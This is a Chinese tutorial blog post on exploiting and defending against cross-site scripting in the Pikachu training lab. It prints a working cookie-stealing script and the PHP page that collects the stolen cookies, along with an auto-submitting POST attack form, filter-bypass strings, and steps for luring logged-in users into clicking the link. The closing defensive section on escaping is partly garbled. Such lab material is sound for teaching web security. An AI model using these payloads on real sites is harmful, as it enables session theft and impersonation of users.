美文网首页
03.(2)XSS利用与防御

03.(2)XSS利用与防御

作者: 新一mghc | 来源:发表于2019-03-02 17:54 被阅读0次

一.漏洞的利用

1.GET型XSS的利用

(1).渗透分析

A. 流程分析

GET型XSS的利用.png

B. 基本环境

存在漏洞页面

http://192.168.58.130/pikachu/vul/xss/xss_reflected_get.php

恶意代码
<script>document.location = 'http://192.168.58.130/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
用户收到的链接

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

(2). 渗透过程

A.构造信息收集代码

<?php
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET['cookie'])){
    $time=date('Y-m-d g:i:s');
    $ipaddress=getenv ('REMOTE_ADDR');
    $cookie=$_GET['cookie'];
    $referer=$_SERVER['HTTP_REFERER'];
    $useragent=$_SERVER['HTTP_USER_AGENT'];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values('$time','$ipaddress','$cookie','$referer','$useragent')";
    $result=mysqli_query($link, $query);
}
header("Location:http://192.168.58.130/pikachu/index.php");//重定向到一个可信的网站

?>

B. 向登录目标网站用户发送恶意链接,诱使其点击

C. 成功收集目标信息,可假冒目标登录

1.POST型XSS的利用

(1).渗透分析

A. 流程分析

POST型XSS的利用.png

B. 基本环境

存在漏洞页面

http://192.168.58.130/pikachu/vul/xss/xsspost/xss_reflected_post.php

用户收到的链接

http://192.168.58.130/pkxss/xcookie/post.html

(2). 渗透过程

A.构造信息收集代码

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.58.130/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.58.130/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
    </script>"
     />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

B. 向登录目标网站用户发送恶意链接,诱使其点击

C. 成功收集目标信息,可假冒目标登录

三. 其它类型的渗透

A. 键盘监控

B. xss的盲打

C. a href 插入js

XSS的绕过

一、转换

  1. 前端绕过
  2. 大小写混合
  3. 拼凑绕过:<scr<script>ipt>alert(1)<scri</script>pt>
  4. 注释绕过:<script>alert(1)<script>

二. 编码

XSS的防御

1.进行转码
htmlspecialchal()
函数htmlspecialchars()函数把预定义的字符转换为HTML实体。

预定义的字符是:

  • &(和号)成为&amp
  • ·(双引号)成为&quot
  • ’(单引号)成为&#039
  • <(小于)成为&t
  • Sok=htmlspe
  • (大于)成为&gt

可用的引号类型:

  • ENT_COMPAT 默认。仅编码双引号。
  • ENT_QUOTES 编码双引号和单引号
  • ENT_NOQUOTES 不编码任何引号。

总的原则:输入做过滤,输出做转义

  • 过滤:根据业务需求进行过滤,比如输入点要求输入手机号,则只允许输入手机号格式的数字。
  • 转义:所有输出到前端的数据都根据输出点进行转义,比如输出到html中进行html实体转义,输入到JS里面的进行JS转义

三、 对参数进行过滤。

PHP:
htmlentities() 或是 htmlspecialchars()
Python:
cgi.escape()
ASP:
Server.HTMLEncode()
ASP.NET:
Server.HtmlEncode() 或 Microsoft Anti-Cross Site Scripting Library
Java:
xssprotect(Open Source Library)
Node.js:
node-validator

javascript:alert(111)
q' oneclick='alert(111)'

相关文章

  • 03.(2)XSS利用与防御

    一.漏洞的利用 1.GET型XSS的利用 (1).渗透分析 A. 流程分析 B. 基本环境 存在漏洞页面 http...

  • 21.浅谈前端WEB安全性(二)

    (二)浅谈前端WEB安全性5.XSS防御6.XSS分类及挖掘方法 5.XSS防御 一.概述 攻击者可以利用XSS漏...

  • WEB 安全测试之 XSS 攻击

    目录结构 1、 背景知识 2、 XSS 漏洞的分类 3、 XSS 防御 4、 如何测试 XSS 漏洞 5、 HTM...

  • 安全包开发整体架构

    SSRF防御 SSRF安全漏洞以及防御实现 XSS防御 xss漏洞以及防御实现 CSRF防御 CSRF安全漏洞以及...

  • XSS攻击与防御

    Web安全之XSS攻防 1. XSS的定义 跨站脚本攻击(Cross Site Scripting),缩写为XSS...

  • XSS攻击与防御

    https://www.cnblogs.com/phpstudy2015-6/p/6767032.html

  • XSS 攻击与防御

    转自:https://blog.csdn.net/ghsau/article/details/17027893 X...

  • 绕过XSS-Filter

    绕过XSS-Filter (1)利用<>标记 XSS-Filter通常过滤转义“<>”“ ”等字符 (2)利用HT...

  • xss防御

    XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Sty...

  • xss防御

    四两拨千斤:HttpOnIy严格地说,HttpOnly并非为了对抗XSS——HttpOnly解决的是XSS后的Co...

网友评论

      本文标题:03.(2)XSS利用与防御

      本文链接:https://www.haomeiwen.com/subject/fflyuqtx.html